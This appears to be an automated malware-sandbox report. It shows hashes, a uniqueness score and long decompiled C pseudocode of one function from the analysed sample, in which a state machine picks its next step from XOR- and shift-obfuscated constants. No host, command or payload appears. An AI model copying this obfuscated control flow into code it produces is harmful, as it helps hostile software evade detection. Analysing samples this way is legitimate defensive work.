Opcode Fuzzy Hash: b22e489dc8e1fa89075f72e02e4714fbceeb7a2da744dafd0dade8df8c5b5272
Instruction Fuzzy Hash: 7372FEB150C3429FC349CF25C58A80BBBE1BBD8758F104A1DF59AA6261D3B4DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003DC5E5 Relevance: 14.8, Strings: 11, Instructions: 1079
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003DC5E5() {
				signed int _v8;
				signed int _v24;
				signed int _v32;
				signed int _v36;
				signed int _v48;
				intOrPtr _v52;
				char _v64;
				signed int _v68;
				char _v88;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v120;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _t1011;
				signed int _t1013;
				void* _t1045;
				signed int _t1057;
				signed int _t1069;
				signed int _t1074;
				signed int _t1078;
				signed int _t1087;
				void* _t1094;
				signed int _t1097;
				signed int _t1104;
				signed int _t1118;
				signed int _t1122;
				signed int _t1144;
				signed int _t1148;
				signed int _t1151;
				signed int _t1156;
				signed int _t1167;
				signed int _t1169;
				signed int _t1171;
				signed int _t1178;
				signed int _t1182;
				signed int _t1186;
				signed int _t1189;
				signed int _t1190;
				signed int _t1192;
				signed int _t1193;
				signed int _t1197;
				signed int _t1198;
				signed int _t1204;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1216;
				signed int _t1220;
				signed int _t1221;
				char* _t1222;
				signed int _t1230;
				signed int _t1231;
				signed int _t1280;
				signed int _t1283;
				signed int _t1287;
				signed int _t1288;
				signed int _t1307;
				void* _t1309;
				void* _t1311;
				void* _t1312;
				void* _t1313;

				_t1309 = (_t1307 & 0xfffffff8) - 0xa0;
				_t1167 = _v148;
				_v112 = 0x21ab5;
				_v108 = 0x4767;
				_t1283 = 0x6393e;
				_t1280 = _v148;
				_v104 = 0x1669e;
				_v100 = 0xc1df7;
				while(1) {
					L1:
					_t1169 = 0x1c;
					while(1) {
						L2:
						_t1311 = _t1283 - 0x79967;
						if(_t1311 > 0) {
							break;
						}
						if(_t1311 == 0) {
							_v160 = 0x49c5fd;
							_v160 = _v160 << 5;
							_v160 = _v160 ^ 0x09371697;
							_t1011 = E003C3C2C();
							_t1283 = 0xd6844;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						_t1312 = _t1283 - 0x3eb29;
						if(_t1312 > 0) {
							__eflags = _t1283 - 0x5cc0e;
							if(__eflags > 0) {
								__eflags = _t1283 - 0x5d714;
								if(_t1283 == 0x5d714) {
									_v156 = 0x5d8d08;
									_v156 = _v156 | 0x471c4d38;
									_v156 = _v156 << 7;
									_v156 = _v156 ^ 0xaeea3d3a;
									_v164 = 0xe45706;
									_t1198 = 0x3e;
									_v164 = _v164 / _t1198;
									_v164 = _v164 | 0x0886513f;
									_v164 = _v164 << 0xb;
									_v164 = _v164 ^ 0x3ff7fb56;
									_push(_v164);
									_push(_v156);
									_v136 = E003DF571(0x3c1404,  &_v132);
									_v156 = 0xa4d4e1;
									_v156 = _v156 * 0x7a;
									_v156 = _v156 ^ 0xd6c7be8e;
									_v156 = _v156 ^ 0x9842e0ac;
									_v164 = 0x188f6f;
									_v164 = _v164 * 0x5a;
									_v164 = _v164 ^ 0x3f072dc4;
									_v164 = _v164 ^ 0x37ab86b3;
									_push(_v164);
									_push(_v156);
									_v144 = E003DF571(0x3c13a4,  &_v140);
									_v164 = 0xc326d9;
									_v164 = _v164 | 0xd26cc0d3;
									_push(0x13);
									_push(0x18);
									_v164 = _v164 / 0x3c13a4;
									_v164 = _v164 / 0x3c13a4;
									_v164 = _v164 ^ 0x0078df1e;
									_v160 = 0x9e1228;
									_v160 = _v160 + 0x5615;
									_v160 = _v160 ^ 0x0093cb48;
									E003D46DD(_v160,  &_v136,  &_v144);
									_v160 = 0x383469;
									asm("sbb esi, esi");
									_v160 = _v160 | 0xbac6ce4d;
									_v160 = _v160 ^ 0xbaf16d9d;
									_v164 = 0xe6834;
									_t1283 = (_t1283 & 0xfff8ac5e) + 0xf6e41;
									_t1204 = 0x18;
									_v164 = _v164 * 0x5d;
									_v164 = _v164 + 0xffff6f08;
									_v164 = _v164 + 0xffff23de;
									_v164 = _v164 ^ 0x053759ba;
									_v156 = 0x9c5511;
									_v156 = _v156 << 8;
									_v156 = _v156 / _t1204;
									_v156 = _v156 ^ 0x06836849;
									E003C43D3(_v160, _v164, _v156, _v144);
									_v156 = 0x1e210d;
									_t1206 = 0x4d;
									_v156 = _v156 * 0x16;
									_v156 = _v156 / _t1206;
									_v156 = _v156 << 0xf;
									_v156 = _v156 ^ 0x4ddc8cbb;
									_v160 = 0x453ad;
									_t1207 = 0x13;
									_v160 = _v160 / _t1207;
									_v160 = _v160 ^ 0x00054d92;
									_v164 = 0x577c38;
									_v164 = _v164 >> 0xe;
									_v164 = _v164 << 6;
									_t1208 = 0x49;
									_v164 = _v164 / _t1208;
									_v164 = _v164 ^ 0x00041c5f;
									_t1011 = E003C43D3(_v156, _v160, _v164, _v136);
									_t1309 = _t1309 + 0x28;
									L112:
									__eflags = _t1283 - 0xf6e41;
									if(_t1283 == 0xf6e41) {
										L116:
										return _t1011;
									}
									while(1) {
										L1:
										_t1169 = 0x1c;
										goto L2;
									}
								}
								__eflags = _t1283 - 0x6393e;
								if(_t1283 == 0x6393e) {
									_t1283 = 0x1f079;
									continue;
								}
								__eflags = _t1283 - 0x74925;
								if(_t1283 == 0x74925) {
									_v156 = 0xa4b26;
									_v156 = _v156 >> 2;
									_v156 = _v156 + 0xffffa1fa;
									_v156 = _v156 ^ 0x0000b1dc;
									_v164 = 0xb0d4db;
									_t1078 = _v164;
									_t1221 = 0x4a;
									_t1256 = _t1078 % _t1221;
									_v164 = _t1078 / _t1221;
									_v164 = _v164 << 0xe;
									_v164 = _v164 << 0x10;
									_v164 = _v164 ^ 0x4006e65c;
									_t1011 = E003C2BF3();
									_v8 = _t1011;
									_t1283 = 0xac758;
									while(1) {
										L1:
										_t1169 = 0x1c;
										goto L2;
									}
								}
								__eflags = _t1283 - 0x77cfa;
								if(_t1283 != 0x77cfa) {
									goto L112;
								}
								_v156 = 0x68462;
								_v156 = _v156 >> 4;
								_v156 = _v156 + 0xffff6a62;
								_v156 = _v156 | 0x76eb6bbf;
								_v156 = _v156 ^ 0xffff37f6;
								_v164 = 0xa9554;
								_v164 = _v164 >> 0xe;
								_v164 = _v164 >> 6;
								_v164 = _v164 + 0xffff8c3e;
								_v164 = _v164 ^ 0xfffa09b3;
								_t1011 = E003D0552();
								_t1283 = 0xe3282;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							if(__eflags == 0) {
								_v156 = 0x2f428;
								_t1222 =  &_v128;
								_v156 = _v156 * 0x60;
								_v156 = _v156 << 0xf;
								_v156 = _v156 ^ 0xc7862337;
								_v164 = 0x787e8e;
								_v164 = _v164 + 0x711e;
								_v164 = _v164 >> 6;
								_v164 = _v164 ^ 0x000e3b08;
								_v160 = 0xe68a1b;
								_v160 = _v160 * 0x21;
								_v160 = _v160 ^ 0x1db4c17d;
								_t1256 = _v156;
								_t1087 = E003C5717(_t1222, _v156, _v164, _v160,  &_v96);
								_t1309 = _t1309 + 0xc;
								__eflags = _t1087;
								if(_t1087 != 0) {
									_t1011 = _v96;
									__eflags = _t1011 - 8;
									if(_t1011 != 8) {
										__eflags = _t1011;
										if(_t1011 == 0) {
											L49:
											_t1283 = 0xbfd28;
											while(1) {
												L1:
												_t1169 = 0x1c;
												goto L2;
											}
										}
										__eflags = _t1011 - 1;
										if(_t1011 != 1) {
											L28:
											_t1283 = 0x4be10;
											while(1) {
												L1:
												_t1169 = 0x1c;
												goto L2;
											}
										}
										goto L49;
									}
									_t1283 = 0x7a5d2;
									while(1) {
										L1:
										_t1169 = 0x1c;
										goto L2;
									}
								}
								_v160 = 0x45e553;
								_v160 = _v160 >> 0xf;
								_v160 = _v160 ^ 0x00094300;
								_v152 = 0xc00605;
								_v152 = _v152 >> 9;
								_v152 = _v152 ^ 0xe0d1d920;
								_v152 = _v152 ^ 0xe0d8bc40;
								_v156 = 0x10f603;
								_v156 = _v156 + 0xffffc00c;
								_v156 = _v156 + 0xc42b;
								_v156 = _v156 | 0x61d3fc25;
								_v156 = _v156 ^ 0x61de459f;
								_v164 = 0x78c965;
								_v164 = _v164 | 0x42d85dd3;
								_push(_t1222);
								_v164 = _v164 * 0x29;
								_v164 = _v164 + 0x97c2;
								_v164 = _v164 ^ 0xb9d2d071;
								_t1011 = E003C2B6C(_v156, _v164);
								_t1280 = _t1011;
								_t1167 = 0xb4521;
								goto L28;
							}
							__eflags = _t1283 - 0x43c3e;
							if(_t1283 == 0x43c3e) {
								_v164 = 0xd6920c;
								_v164 = _v164 << 5;
								_v164 = _v164 >> 8;
								_v164 = _v164 ^ 0x001d3a3e;
								_v160 = 0xe423f9;
								_v160 = _v160 * 0xf;
								_v160 = _v160 ^ 0x0d520841;
								_t1011 = E003D9F11();
								_t1283 = 0x7c35;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0x4be10;
							if(__eflags == 0) {
								_v164 = 0x3e194a;
								_v164 = _v164 | 0xfefffefb;
								_v164 = _v164 ^ 0xfeff9f71;
								_v152 = 0x1fbd0;
								_v152 = _v152 << 3;
								_v152 = _v152 ^ 0xfa3cd9ac;
								_v152 = _v152 << 0xc;
								_v152 = _v152 ^ 0x3072a3a7;
								_v156 = 0xd647d3;
								_v156 = _v156 * 0xd;
								_v156 = _v156 + 0xffffbc00;
								_v156 = _v156 * 0x1e;
								_v156 = _v156 ^ 0x466f6e47;
								_v160 = 0xe7e4c8;
								_v160 = _v160 + 0xffffec6c;
								_v160 = _v160 ^ 0x00ec2276;
								_t253 =  &_v160; // 0xec2276
								_t1256 = _v152;
								_t1011 = E003C79D0(_v164, _v152, __eflags, _v156, _v128,  *_t253);
								_t1309 = _t1309 + 0xc;
								_t1283 = 0x9b291;
								goto L1;
							}
							__eflags = _t1283 - 0x4e180;
							if(_t1283 == 0x4e180) {
								__eflags = _t1280;
								if(_t1280 == 0) {
									L40:
									_t1283 = _t1167;
									goto L112;
								}
								_v160 = 0xca805d;
								_v160 = _v160 << 0xe;
								_v160 = _v160 ^ 0xa01d12c7;
								_t1094 = E003D8EEB();
								_v152 = 0x5a6919;
								_t1256 = _t1280;
								_v152 = _v152 >> 1;
								_v152 = _v152 | 0xfdea27ad;
								_v152 = _v152 << 0xe;
								_v152 = _v152 ^ 0xcdeb4102;
								_v164 = 0xf15bde;
								_v164 = _v164 ^ 0x48554077;
								_v164 = _v164 ^ 0x48afd6cb;
								_v160 = 0xd61a74;
								_v160 = _v160 * 0x76;
								_v160 = _v160 ^ 0x62b2d8de;
								_t1011 = E003C23E3(_v164, _t1280, _v160, _t1094);
								__eflags = _t1011 - _v152;
								if(_t1011 == _v152) {
									_v156 = 0xaa785e;
									_v156 = _v156 << 0xc;
									_v156 = _v156 >> 8;
									_v156 = _v156 + 0xdd42;
									_v156 = _v156 ^ 0x00ababa0;
									_v152 = 0x14b827;
									_v152 = _v152 << 2;
									_t1230 = 0x1c;
									_v152 = _v152 * 0x3f;
									_t1097 = _v152;
									_t1256 = _t1097 % _t1230;
									_v152 = _t1097 / _t1230;
									_t221 =  &_v152;
									 *_t221 = _v152 ^ 0x00b6daa8;
									__eflags =  *_t221;
									_t1011 = E003D0B84();
									goto L40;
								}
								_t1283 = 0x3bf7a;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0x5b7c6;
							if(_t1283 != 0x5b7c6) {
								goto L112;
							}
							_v164 = 0xd16f40;
							_t1104 = _v164;
							_t1283 = 0xb4521;
							_t1231 = 0x75;
							_t1256 = _t1104 % _t1231;
							_v164 = _t1104 / _t1231;
							_v164 = _v164 << 0x10;
							_v164 = _v164 ^ 0xca402710;
							_t1011 = _v164;
							_v36 = _t1011;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						if(_t1312 == 0) {
							_v152 = 0xd3ebc9;
							_t1210 = 5;
							_v152 = _v152 / _t1210;
							_v152 = _v152 + 0xffff1f60;
							_t1211 = 0x25;
							_v152 = _v152 / _t1211;
							_v152 = _v152 ^ 0x0002569a;
							_t1011 = E003D681A();
							__eflags = _t1011;
							if(_t1011 == 0) {
								_v152 = 0xa9614;
								_v152 = _v152 << 3;
								_v152 = _v152 >> 0xb;
								_v152 = _v152 >> 0xf;
								_t157 =  &_v152;
								 *_t157 = _v152 ^ 0x00010ede;
								__eflags =  *_t157;
								_t1011 = E003D1DCF();
							}
							goto L28;
						}
						_t1313 = _t1283 - 0x19916;
						if(_t1313 > 0) {
							__eflags = _t1283 - 0x1f079;
							if(__eflags == 0) {
								_v152 = 0x8e3267;
								_t1212 = 0x59;
								_v152 = _v152 * 0x7c;
								_t1057 = _v152;
								_t1256 = _t1057 % _t1212;
								_v152 = _t1057 / _t1212;
								_v152 = _v152 << 1;
								_v152 = _v152 ^ 0x018d40d9;
								_v160 = 0x7fd872;
								_v160 = _v160 | 0x5df7d616;
								_v160 = _v160 ^ 0x5df30999;
								_t1011 = E003CE88D(__eflags);
								__eflags = _t1011;
								if(_t1011 == 0) {
									goto L116;
								}
								_t1283 = 0x79967;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0x2b090;
							if(_t1283 == 0x2b090) {
								_v164 = 0x3fb8ed;
								_v164 = _v164 << 8;
								_v164 = _v164 ^ 0x29c2c749;
								_v164 = _v164 ^ 0x1677bf2e;
								_v52 = E003D9A87();
								_v152 = 0x5cb903;
								_v152 = _v152 ^ 0x452bd4fe;
								_v152 = _v152 ^ 0x0fe0acfa;
								_v152 = _v152 ^ 0xcce52f67;
								_v152 = _v152 ^ 0x867f6ce0;
								_v160 = 0xd2c917;
								_v160 = _v160 + 0xffff5643;
								_v160 = _v160 ^ 0x00dae9e2;
								_v164 = 0x899d6e;
								_v164 = _v164 ^ 0xbab660f4;
								_v164 = _v164 >> 0xc;
								_v164 = _v164 ^ 0x000b0430;
								_t1256 = _v152;
								_t1011 = E003DAF07(_t1062, _v152, _v160, _v164);
								_v48 = _t1011;
								_t1283 = 0x10940;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0x3a6ab;
							if(_t1283 == 0x3a6ab) {
								_v152 = 0x9fba3e;
								_v152 = _v152 << 3;
								_v152 = _v152 + 0xb860;
								_v152 = _v152 ^ 0x3e90c51e;
								_v152 = _v152 ^ 0x3a64f751;
								_t1011 = E003CC7B4();
								_t1283 = 0x43c3e;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0x3bf7a;
							if(_t1283 != 0x3bf7a) {
								goto L112;
							}
							_v164 = 0x961b09;
							_v164 = _v164 | 0x8d5e3cee;
							_t1216 = 0x52;
							_v164 = _v164 / _t1216;
							_v164 = _v164 >> 9;
							_v164 = _v164 ^ 0x00021f88;
							_t1011 = E003CFD5C();
							goto L116;
						}
						if(_t1313 == 0) {
							_v160 = 0x307252;
							_v160 = _v160 >> 0xe;
							_v160 = _v160 ^ 0x00099f83;
							_t1011 = E003D39B8(_t1169, _t1256);
							_t1283 = 0x91bf;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						if(_t1283 == 0x7c35) {
							_v164 = 0x19b827;
							_v164 = _v164 + 0xffffd2c9;
							_v164 = _v164 ^ 0x0013c3d4;
							_v160 = 0xbc5e70;
							_v160 = _v160 | 0xb91575ff;
							_v160 = _v160 ^ 0xb9b77eab;
							_v148 = 0xfc5ae5;
							_push(_t1169);
							_v148 = _v148 * 0x43;
							_v148 = _v148 ^ 0x42084395;
							_t1011 = E003CDF44(_v164, _v160, _v148);
							goto L116;
						}
						if(_t1283 == 0x86a3) {
							_v160 = 0x587bcd;
							_v160 = _v160 | 0x89f5524d;
							_v160 = _v160 ^ 0x89fd1d0d;
							_v164 = 0xb26c2b;
							_t1069 = _v164;
							_t1256 = _t1069 % _t1169;
							_v164 = _t1069 / _t1169;
							_v164 = _v164 + 0x1454;
							_v164 = _v164 ^ 0x000cdb12;
							_t1011 = E003D3E98();
							asm("sbb esi, esi");
							_t1283 = ( ~_t1011 & 0xfff254fc) + 0xf441a;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						if(_t1283 == 0x91bf) {
							_v160 = 0x7dcf94;
							_v160 = _v160 | 0xd84f0656;
							_v160 = _v160 ^ 0xd8724ca4;
							_t1011 = E003DFADC();
							__eflags = _t1011;
							if(_t1011 == 0) {
								goto L116;
							}
							_t1283 = 0xb87fd;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						if(_t1283 != 0x10940) {
							goto L112;
						} else {
							_v164 = 0xa6f8a;
							_v164 = _v164 ^ 0xed6649ad;
							_v164 = _v164 ^ 0xed6ee06a;
							_v160 = 0x79b97c;
							_t1074 = _v160;
							_t1220 = 0x3b;
							_t1256 = _t1074 % _t1220;
							_v160 = _t1074 / _t1220;
							_v160 = _v160 ^ 0x000d74ed;
							_t1011 = E003D79BC();
							_v24 = _t1011;
							_t1283 = 0xf848b;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
					}
					__eflags = _t1283 - 0xbfd28;
					if(__eflags > 0) {
						__eflags = _t1283 - 0xe6230;
						if(__eflags > 0) {
							__eflags = _t1283 - 0xf441a;
							if(_t1283 == 0xf441a) {
								_v160 = 0xf5924f;
								_v160 = _v160 + 0xc671;
								_v160 = _v160 | 0xf3d5224e;
								_v160 = _v160 ^ 0xf3faacf4;
								_t1013 = E003C8ED3();
								__eflags = _t1013;
								if(_t1013 == 0) {
									_v160 = 0xcdb67c;
									_v160 = _v160 >> 3;
									_v160 = _v160 | 0x22e9ac17;
									_v160 = _v160 ^ 0x22f39fdd;
									_t1011 = E003D681A();
									__eflags = _t1011;
									if(_t1011 == 0) {
										_t1283 = 0xe3282;
										goto L112;
									}
									_t1283 = 0x77cfa;
									while(1) {
										L1:
										_t1169 = 0x1c;
										goto L2;
									}
								}
								_v160 = 0x2e5fb4;
								_v160 = _v160 + 0xffff8fed;
								_v160 = _v160 ^ 0xc905e752;
								_v160 = _v160 ^ 0xc927da53;
								_t1011 = E003D681A();
								asm("sbb esi, esi");
								_t1287 =  ~_t1011 & 0x0000ac02;
								L80:
								_t1283 = _t1287 + 0x990a9;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0xf848b;
							if(_t1283 == 0xf848b) {
								_v160 = 0x883ccb;
								_v160 = _v160 + 0xffffaaa7;
								_v160 = _v160 * 0x3d;
								_v160 = _v160 ^ 0x206106b2;
								_t1011 = E003CC14C();
								_v32 = _t1011;
								_t1283 = 0x74925;
								while(1) {
									L1:
									_t1169 = 0x1c;
									goto L2;
								}
							}
							__eflags = _t1283 - 0xf9471;
							if(_t1283 != 0xf9471) {
								goto L112;
							}
							_v164 = 0x9ab204;
							_v164 = _v164 * 0x6a;
							_v164 = _v164 | 0x859dd0db;
							_v164 = _v164 ^ 0x448d01ed;
							_v164 = _v164 ^ 0x811bbc48;
							_t1045 = E003D8EEB();
							_v156 = 0xe62b32;
							_v156 = _v156 << 0xf;
							_t1288 = 0x59;
							_v156 = _v156 / _t1288;
							_v156 = _v156 ^ 0x00386187;
							_v148 = 0x2ce93d;
							_v148 = _v148 + 0x675c;
							_v148 = _v148 ^ 0x002ec997;
							_v152 = 0xc39e8a;
							_v152 = _v152 + 0xa435;
							_v152 = _v152 ^ 0x00cafac5;
							_v160 = 0x46049a;
							_v160 = _v160 * 0x34;
							_v160 = _v160 + 0xffff7c53;
							_v160 = _v160 ^ 0x0e3cd2c4;
							_v164 = 0x1c2dfa;
							_v164 = _v164 >> 0xd;
							_v164 = _v164 + 0xeda6;
							_v164 = _v164 + 0x29ff;
							_v164 = _v164 ^ 0x00011887;
							_t1256 = _v156;
							_t1011 = E003D6B98(_t1045, _v156,  &_v128,  &_v120, _v164, _v148, _v152, _v160);
							_t1309 = _t1309 + 0x18;
							asm("sbb esi, esi");
							_t1283 = ( ~_t1011 & 0xfff6379d) + 0xf9471;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						if(__eflags == 0) {
							_v160 = 0x4119a2;
							_v160 = _v160 * 0x32;
							_v160 = _v160 * 0x3b;
							_v160 = _v160 ^ 0xee2c253e;
							_t1011 = E003DE978(_t1169, _t1256);
							__eflags = _t1011;
							if(_t1011 == 0) {
								goto L116;
							}
							_t1283 = 0x86a3;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xc77f3;
						if(_t1283 == 0xc77f3) {
							_v164 = 0xa2ae18;
							_v164 = _v164 | 0xda561fd6;
							_v164 = _v164 >> 0xa;
							_v164 = _v164 | 0x97accd89;
							_v164 = _v164 ^ 0x97b0a4f3;
							_v160 = 0x49ee51;
							_t1171 = 3;
							_v160 = _v160 * 0x30;
							_t1256 =  &_v120;
							_v160 = _v160 / _t1171;
							_v160 = _v160 ^ 0x049e92be;
							_t1011 = E003D4930(_v164,  &_v120, _v160,  &_v68);
							asm("sbb esi, esi");
							_t1283 = ( ~_t1011 & 0x0005e1e0) + 0x9b291;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xd6844;
						if(_t1283 == 0xd6844) {
							_v160 = 0x75c236;
							_v160 = _v160 << 8;
							_v160 = _v160 ^ 0x75cf9c88;
							_v164 = 0x28abda;
							_v164 = _v164 | 0x9ce8b3a8;
							_v164 = _v164 >> 5;
							_v164 = _v164 >> 0x10;
							_v164 = _v164 ^ 0x00038206;
							_t1011 = E003C25E7(_t1169);
							__eflags = _t1011;
							if(_t1011 == 0) {
								goto L116;
							}
							_t1283 = 0xda0ec;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xda0ec;
						if(_t1283 == 0xda0ec) {
							_v164 = 0x12e727;
							_v164 = _v164 * 0x3e;
							_v164 = _v164 ^ 0x049c26fd;
							_v160 = 0x67085d;
							_v160 = _v160 >> 1;
							_v160 = _v160 + 0x397b;
							_v160 = _v160 ^ 0x003afa48;
							_t1011 = E003D9CA1();
							__eflags = _t1011;
							if(_t1011 == 0) {
								goto L116;
							}
							_t1283 = 0xe6230;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xe3282;
						if(_t1283 != 0xe3282) {
							goto L112;
						}
						_v164 = 0x6e5e41;
						_v164 = _v164 + 0xa6d0;
						_v164 = _v164 ^ 0x00686332;
						_v160 = 0xcce858;
						_v160 = _v160 ^ 0xfd16d7a3;
						_v160 = _v160 >> 7;
						_v160 = _v160 ^ 0x01f94166;
						_t1011 = E003DA9EE();
						_t1283 = 0x19916;
						while(1) {
							L1:
							_t1169 = 0x1c;
							goto L2;
						}
					}
					if(__eflags == 0) {
						_v152 = 0x369525;
						_v152 = _v152 ^ 0xba1798bb;
						_v152 = _v152 << 8;
						_v152 = _v152 ^ 0x21036ec1;
						_v156 = 0xa55849;
						_v156 = _v156 >> 0xf;
						_v156 = _v156 << 0xa;
						_v156 = _v156 << 0xc;
						_v156 = _v156 ^ 0x528412fd;
						_v164 = 0x1c3bbf;
						_v164 = _v164 << 0xe;
						_v164 = _v164 + 0xffffa8f9;
						_v164 = _v164 << 0xd;
						_v164 = _v164 ^ 0xed1e06ec;
						_t1256 = _v152;
						_t1011 = E003C4497( &_v88, _v152, _v156, _v164);
						__eflags = _t1011;
						if(_t1011 == 0) {
							_t1011 = _v96;
							__eflags = _t1011;
							if(_t1011 == 0) {
								_v164 = 0xf5ee1d;
								_v164 = _v164 << 0x10;
								_v164 = _v164 | 0xcffbf6de;
								_v164 = _v164 ^ 0xeffb27be;
								_v156 = 0xa7e903;
								_v156 = _v156 << 6;
								_t1156 = _v156;
								_t1182 = 0xb;
								_t1256 = _t1156 % _t1182;
								_push(_t1182);
								_v156 = _t1156 / _t1182;
								_v156 = _v156 ^ 0x03d45064;
								_v152 = 0x5f8f72;
								_v152 = _v152 ^ 0x200e4e2a;
								_v152 = _v152 << 0xb;
								_v152 = _v152 ^ 0x8e077ba0;
								_v160 = 0x68733a;
								_v160 = _v160 + 0xc84f;
								_t761 =  &_v160;
								 *_t761 = _v160 ^ 0x0067cfa9;
								__eflags =  *_t761;
								_t1280 = E003C2B6C(_v152, _v160);
								_t1011 = _v96;
							}
							__eflags = _t1011 - 1;
							if(_t1011 == 1) {
								_v152 = 0x103bbb;
								_v152 = _v152 + 0xffffacb0;
								_v152 = _v152 ^ 0x29e7f7d2;
								_v152 = _v152 ^ 0x29e9cf30;
								_v156 = 0xebd3ad;
								_v156 = _v156 + 0xffffe963;
								_v156 = _v156 + 0xffff9e0c;
								_v156 = _v156 ^ 0x00e92a13;
								_v160 = 0x6aa7e1;
								_v160 = _v160 >> 0x10;
								_t1151 = _v160;
								_t1178 = 0xf;
								_t1256 = _t1151 % _t1178;
								_push(_t1178);
								_v160 = _t1151 / _t1178;
								_v160 = _v160 ^ 0x00004e27;
								_v164 = 0x6f7756;
								_v164 = _v164 >> 0xb;
								_v164 = _v164 * 0x1e;
								_v164 = _v164 | 0x36e4b904;
								_t800 =  &_v164;
								 *_t800 = _v164 ^ 0x36e5ccd4;
								__eflags =  *_t800;
								_t1011 = E003C2B6C(_v160, _v164);
								_t1280 = _t1011;
							}
						} else {
							_t1280 = 0;
						}
						_t1167 = 0xb4521;
						_t1283 = 0x3eb29;
						while(1) {
							L1:
							_t1169 = 0x1c;
							goto L2;
						}
					}
					__eflags = _t1283 - 0x9b291;
					if(__eflags > 0) {
						__eflags = _t1283 - 0xa3cab;
						if(_t1283 == 0xa3cab) {
							_v160 = 0x39fb32;
							_v160 = _v160 << 9;
							_v160 = _v160 ^ 0x73fddfa7;
							_t1011 = E003C51B7();
							asm("sbb esi, esi");
							_t1287 =  ~_t1011 & 0xfff6eb8c;
							__eflags = _t1287;
							goto L80;
						}
						__eflags = _t1283 - 0xac758;
						if(_t1283 == 0xac758) {
							_v164 = 0x930f00;
							_t1118 = _v164;
							_t1283 = 0x5b7c6;
							_t1186 = 0x54;
							_t1256 = _t1118 % _t1186;
							_v164 = _t1118 / _t1186;
							_v164 = _v164 | 0x221818ae;
							_v164 = _v164 * 6;
							_v164 = _v164 ^ 0xcdaf9dee;
							_t1011 = _v164;
							_v68 = _t1011;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xb4521;
						if(_t1283 == 0xb4521) {
							_v164 = 0xf8697c;
							_v164 = _v164 | 0x8ff367ad;
							_v164 = _v164 + 0xffffbcd7;
							_v164 = _v164 << 2;
							_v164 = _v164 ^ 0x3fe10b6a;
							_v156 = 0xd071b1;
							_v156 = _v156 + 0xffff7679;
							_v156 = _v156 + 0xb9c7;
							_v156 = _v156 ^ 0x00db8c75;
							_t1256 = _v156;
							_t1011 = E003C3092(_v164, _v156,  &_v64);
							_t1283 = 0xc77f3;
							while(1) {
								L1:
								_t1169 = 0x1c;
								goto L2;
							}
						}
						__eflags = _t1283 - 0xb87fd;
						if(_t1283 != 0xb87fd) {
							goto L112;
						}
						_v156 = 0x375768;
						_v156 = _v156 + 0xffff3d8c;
						_v156 = _v156 << 0xe;
						_v156 = _v156 ^ 0xeda348e6;
						_v156 = _v156 ^ 0x4895b5b5;
						_v164 = 0x646b42;
						_t639 =  &_v164; // 0x646b42
						_t1122 =  *_t639;
						_t1189 = 0x46;
						_t1256 = _t1122 % _t1189;
						_v164 = _t1122 / _t1189;
						_v164 = _v164 + 0xffff6a67;
						_v164 = _v164 * 0x3d;
						_v164 = _v164 ^ 0x003b56da;
						E003CB1A1();
						_v164 = 0xecbbd2;
						_v164 = _v164 << 7;
						_v164 = _v164 + 0xb47b;
						_v164 = _v164 + 0xdeb6;
						_v164 = _v164 ^ 0x765ae8a0;
						_t1011 = E003D681A();
						asm("sbb esi, esi");
						_t1283 = ( ~_t1011 & 0xffff6a6d) + 0x43c3e;
						while(1) {
							L1:
							_t1169 = 0x1c;
							goto L2;
						}
					}
					if(__eflags == 0) {
						_v156 = 0x8c19e4;
						_t1190 = 0x22;
						_v156 = _v156 / _t1190;
						_v156 = _v156 ^ 0xefefbbba;
						_v156 = _v156 | 0x9030afbe;
						_v156 = _v156 ^ 0xfff34b1f;
						_v164 = 0x3b7b3b;
						_t604 =  &_v164; // 0x3b7b3b
						_v164 =  *_t604 * 0x39;
						_t606 =  &_v164; // 0x3b7b3b
						_v164 =  *_t606 * 0x36;
						_v164 = _v164 | 0x2a68dbcb;
						_v164 = _v164 ^ 0xeb6651b8;
						_v152 = 0xfa2c75;
						_v152 = _v152 >> 6;
						_v152 = _v152 + 0x502c;
						_v152 = _v152 ^ 0x0000d409;
						_v160 = 0xf1bfcd;
						_v160 = _v160 >> 0xd;
						_v160 = _v160 ^ 0x000caa7b;
						_t1256 = _v164;
						_t1011 = E003C79D0(_v156, _v164, __eflags, _v152, _v120, _v160);
						_t1309 = _t1309 + 0xc;
						L69:
						_t1283 = 0x4e180;
						while(1) {
							L1:
							_t1169 = 0x1c;
							goto L2;
						}
					}
